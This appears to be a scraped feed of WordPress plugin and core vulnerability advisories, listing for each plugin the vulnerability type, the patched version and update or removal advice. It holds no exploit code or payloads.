Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DeepL API translation plugin

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Ultimate Taxonomy Manager

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: visitor-maps

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.8.7
Recommended Action: Update to version 1.5.8.7, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Blind SQL Injection
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Rich Counter

Vulnerability: JavaScript Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Youtube Channel Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Connections Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: 8.5.9
Recommended Action: Update to version 8.5.9, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Chaty <= 2.8.2 Reflected Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: WhyDoWork AdSense

Plugin: Kanban Boards for WordPress

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: Gutenberg Block Editor Toolkit – EditorsKit

Vulnerability: Authenticated (Contributor+) Code Injection
Patched Version: 1.31.6
Recommended Action: Update to version 1.31.6, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Yatra – Tour and Travel Booking Solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: MainWP Broken Link Checker

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redux Framework

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.21
Recommended Action: Update to version 4.1.21, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Missing Authorization Checks
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Schema & Structured Data for WP & AMP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.24
Recommended Action: Update to version 1.24, or a newer patched version

Plugin: WP eCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.9.1
Recommended Action: Update to version 3.8.9.1, or a newer patched version

Plugin: MailPoet – Newsletters, Email Marketing, and Automation

Vulnerability: Reflected Cross-Site Scripting via URL parameter
Patched Version: 3.23.2
Recommended Action: Update to version 3.23.2, or a newer patched version

Plugin: Membership Simplified

Vulnerability: SQL Injection
Patched Version: 1.58
Recommended Action: Update to version 1.58, or a newer patched version

Plugin: Who Hit The Page – Hit Counter

Plugin: Restaurant & Cafe Addon for Elementor

Vulnerability: Missing Authorization
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Configurable Tag Cloud (CTC)

Vulnerability: Cross-Site Request Forgery via ctc_options_page()
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: File Manager

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 4.9
Recommended Action: Update to version 4.9, or a newer patched version

Plugin: UTM Tracker

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting in Youtube URL Embeds
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Smart SEO Tool – SEO优化插件

Vulnerability: Cross-Site Request Forgery via ‘wp_ajax_wb_smart_seo_tool’
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Custom Field Suite

Vulnerability: Missing Authorization
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Web3 – Crypto wallet Login & NFT token gating

Vulnerability: Authentication Bypass
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.62
Recommended Action: Update to version 3.2.62, or a newer patched version

Plugin: WP Users Media

Vulnerability: Cross-Site Request Forgery in wpusme_save_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gecka Terms Thumbnails

Vulnerability: Authenticated (Subscriber+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Note Press

Vulnerability: SQL Injection
Patched Version: 0.1.2
Recommended Action: Update to version 0.1.2, or a newer patched version

Plugin: Image Slider by NextCode – Photo & Video Slider

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zedna eBook download

Vulnerability: Directory Traversal
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Reflected Cross-Site Scripting via message_id
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Two-factor authentication (formerly IP Vault)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Reflected Cross Site Scripting issue on the [ld_profile] search field
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Improper Input Validation
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Meow Gallery

Vulnerability: SQL Injection
Patched Version: 4.1.9
Recommended Action: Update to version 4.1.9, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated Stored Cross-Site Scripting via Group Names
Patched Version: 5.8.23
Recommended Action: Update to version 5.8.23, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Sensitive Data Exposure
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Contributor+) Blind SQL Injection via Shortcode
Patched Version: 5.0.10
Recommended Action: Update to version 5.0.10, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.7
Recommended Action: Update to version 5.6.7, or a newer patched version

Plugin: WP Human Resource Management

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Crafty Social Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: CopySafe Web Protection

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.14
Recommended Action: Update to version 3.14, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.21.83
Recommended Action: Update to version 4.21.83, or a newer patched version

Plugin: Block wp-login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WappPress – Create Mobile App for any WordPress site with our Mobile App Builder in just 1 minute

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Membership Database

Plugin: Contact Form Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Directory Traversal
Patched Version: 0.8.9.6
Recommended Action: Update to version 0.8.9.6, or a newer patched version

Plugin: Custom Post Type UI

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: User Enumeration Bypass
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Local File Disclosure
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Tab Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress < 5.2
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: Opensea

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: PictoBrowser

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Authenticated Stored Cross-Site scripting via FB Pixel ID and Google Analytics ID
Patched Version: 1.6.13
Recommended Action: Update to version 1.6.13, or a newer patched version

Core: WordPress MU

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Emails & Newsletters with Jackmail

Vulnerability: Authenticated (Subscriber+) CSV Injecton
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Syncee Collective Dropshipping

Vulnerability: Missing Authorization.
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Open User Map

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.27
Recommended Action: Update to version 1.3.27, or a newer patched version

Plugin: Social Buttons Pack by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: JS Multi Hotel

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Missing Authorization via save_ditty_permissions_check
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: WPML

Vulnerability: SQL Injection via lang Parameter
Patched Version: 3.1.9.1
Recommended Action: Update to version 3.1.9.1, or a newer patched version

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 2.10.1
Recommended Action: Update to version 2.10.1, or a newer patched version

Plugin: WP-Lister Lite for Amazon

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 9.7.4
Recommended Action: Update to version 9.7.4, or a newer patched version

Plugin: WP FEvents Book

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcode IMDB

Plugin: ooorl

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .51.1
Recommended Action: Update to version .51.1, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6.0
Recommended Action: Update to version 4.6.0, or a newer patched version

Plugin: WP Hide & Security Enhancer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Sermon’e – Sermons Online

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Cross-Site Request Forgery to Setting Modification
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: Generate Images (AI) – Magic Post Thumbnail

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: User Meta – User Profile Builder and User management plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_add_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Global Flash Gallery

Vulnerability: SQL Injection
Patched Version: 0.15.2
Recommended Action: Update to version 0.15.2, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Missing Authorization Checks
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Authentication Bypass
Patched Version: 7.6.5
Recommended Action: Update to version 7.6.5, or a newer patched version

Plugin: Ninja Forms – File Uploads

Vulnerability: File Uploads <= 3.0.22
Patched Version: 3.0.23
Recommended Action: Update to version 3.0.23, or a newer patched version

Plugin: WP Mail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Defender Security – Malware Scanner, Login Security & Firewall

Vulnerability: Hide Login Page Feature Protection Bypass
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: WP Simple Adsense Insertion

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Coditor – Code Editor

Vulnerability: Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Booking Price Manipulation via bookingpress_confirm_booking
Patched Version: 1.0.75
Recommended Action: Update to version 1.0.75, or a newer patched version

Plugin: White Label CMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Core: WordPress MU

Vulnerability: Username Enumeration
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Clockwork SMS Notfications

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image horizontal reel scroll slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 13.3
Recommended Action: Update to version 13.3, or a newer patched version

Plugin: Login for Google Apps

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Shop Manager+) Missing Authorization to Arbitrary Options Update
Patched Version: 7.1.0
Recommended Action: Update to version 7.1.0, or a newer patched version

Plugin: Optimize Database after Deleting Revisions

Vulnerability: Missing Authorization via ‘odb_csv_download’
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Easy Digital Downloads – htaccess Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Autoptimize

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Plugin: WP Marketplace – Complete Shopping Cart / eCommerce Solution

Vulnerability: Arbitrary File Download
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: WPMobile.App — Android and iOS Mobile Application

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 11.14
Recommended Action: Update to version 11.14, or a newer patched version

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Team Members

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘rawdata’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: eShop

Vulnerability: Cross-Site Scripting
Patched Version: 6.3.12
Recommended Action: Update to version 6.3.12, or a newer patched version

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 2.15.0
Recommended Action: Update to version 2.15.0, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.8.4.3
Recommended Action: Update to version 1.8.4.3, or a newer patched version

Plugin: f(x) TOC

Plugin: WP Pipes

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Survey Maker

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Product Catalog Feed by PixelYourSite

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: 3DPrint

Vulnerability: Cross-Site Request Forgery to Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: License Manager for WooCommerce

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.11
Recommended Action: Update to version 2.2.11, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.77.32
Recommended Action: Update to version 1.0.77.32, or a newer patched version

Plugin: WordPress Slider Block Gutenslider

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Any Hostname

Plugin: Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina)

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_clear_cache_of_allsites_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Live Composer – Free WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.24
Recommended Action: Update to version 1.5.24, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Login Lockdown & Protection

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.07
Recommended Action: Update to version 2.07, or a newer patched version

Plugin: Ebook Store

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.78
Recommended Action: Update to version 5.78, or a newer patched version

Plugin: cformsII

Vulnerability: Unauthenticated stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: nextgen-smooth-gallery

Core: WordPress

Vulnerability: Cross-Site Scripting via MediaElement.js
Patched Version: 3.7.14
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.14, 3.8.14, 3.9.12, 4.0.11, 4.1.11, 4.2.8, 4.3.4, 4.4.3, 4.5.2

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.59
Recommended Action: Update to version 1.6.59, or a newer patched version

Plugin: MainWP Maintenance Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WordPress Contact Forms by Cimatti

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.12
Recommended Action: Update to version 1.4.12, or a newer patched version

Plugin: Chilexpress woo oficial

Plugin: Collapse-O-Matic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Simple Share Buttons Adder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.25.6
Recommended Action: Update to version 1.25.6, or a newer patched version

Plugin: WordPress Tables

Vulnerability: Reflected Cross-Site Scripting via error_msg
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RSSImport

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login and Logout Redirect

Plugin: Analytics for Woo – Putler Accurate Analytics and Reports for your WooCommerce Store

Vulnerability: Missing Authorization via ‘putler_connector_sync_complete’
Patched Version: 2.13.0
Recommended Action: Update to version 2.13.0, or a newer patched version

Plugin: ActiveCampaign for WooCommerce

Vulnerability: Missing Authorization to Error Log Deletion
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Bold Page Builder

Vulnerability: PHP Object Injection
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Back In Stock Notifier for WooCommerce | Manage Inventory and Waitlist Product for WooCommerce

Vulnerability: Missing Authorization via API
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Complete Gallery Manager for WordPress | Galleries

Vulnerability: Arbitrary File Upload
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: WP-FlyBox

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.13.45
Recommended Action: Update to version 7.13.45, or a newer patched version

Plugin: WP Report Post

Plugin: Toolset Types – Custom Post Types, Custom Fields and Taxonomies

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 3.4.18
Recommended Action: Update to version 3.4.18, or a newer patched version

Plugin: Featured Image from URL (FIFU)

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.10
Recommended Action: Update to version 2.8.10, or a newer patched version

Plugin: Relevant – Related, Featured, Latest, and Popular Posts by BestWebSoft

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Authors List

Vulnerability: Reflected Cross-Site Scripting via al_id
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: article2pdf

Vulnerability: Denial of Service
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 123.chat – 1:1 Live Video Chat Tool Plugin

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Chaty <= 3.1.1
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Core: WordPress

Vulnerability: Authentication Bypass
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Gwyn’s Imagemap Selector

Plugin: WordPress prettyPhoto

Vulnerability: DOM Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WP Rollback – Rollback Plugins and Themes

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: Missing Authorization on Rest Route
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Portfolio Gallery – Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: FlagEm

Plugin: wordpress plugin rockhoist-badges

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Sensitive Information Exposure via Diff Response
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Display Data on your site! Create Dynamic Content Templates from any form of data. Works with ACF, Pods, BuddyPress/ BuddyBoss

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: HDW Player Plugin (Video Player & Video Gallery)

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Automatic YouTube Gallery

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Request Forgery via admin_galleries
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: a3 Portfolio

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Contact Forms – Drag & Drop Contact Form Builder

Vulnerability: Drag & Drop Contact Form Builder <= 1.0.5
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Tape

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pay With Tweet

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Countdown Block

Vulnerability: Missing Authorization
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

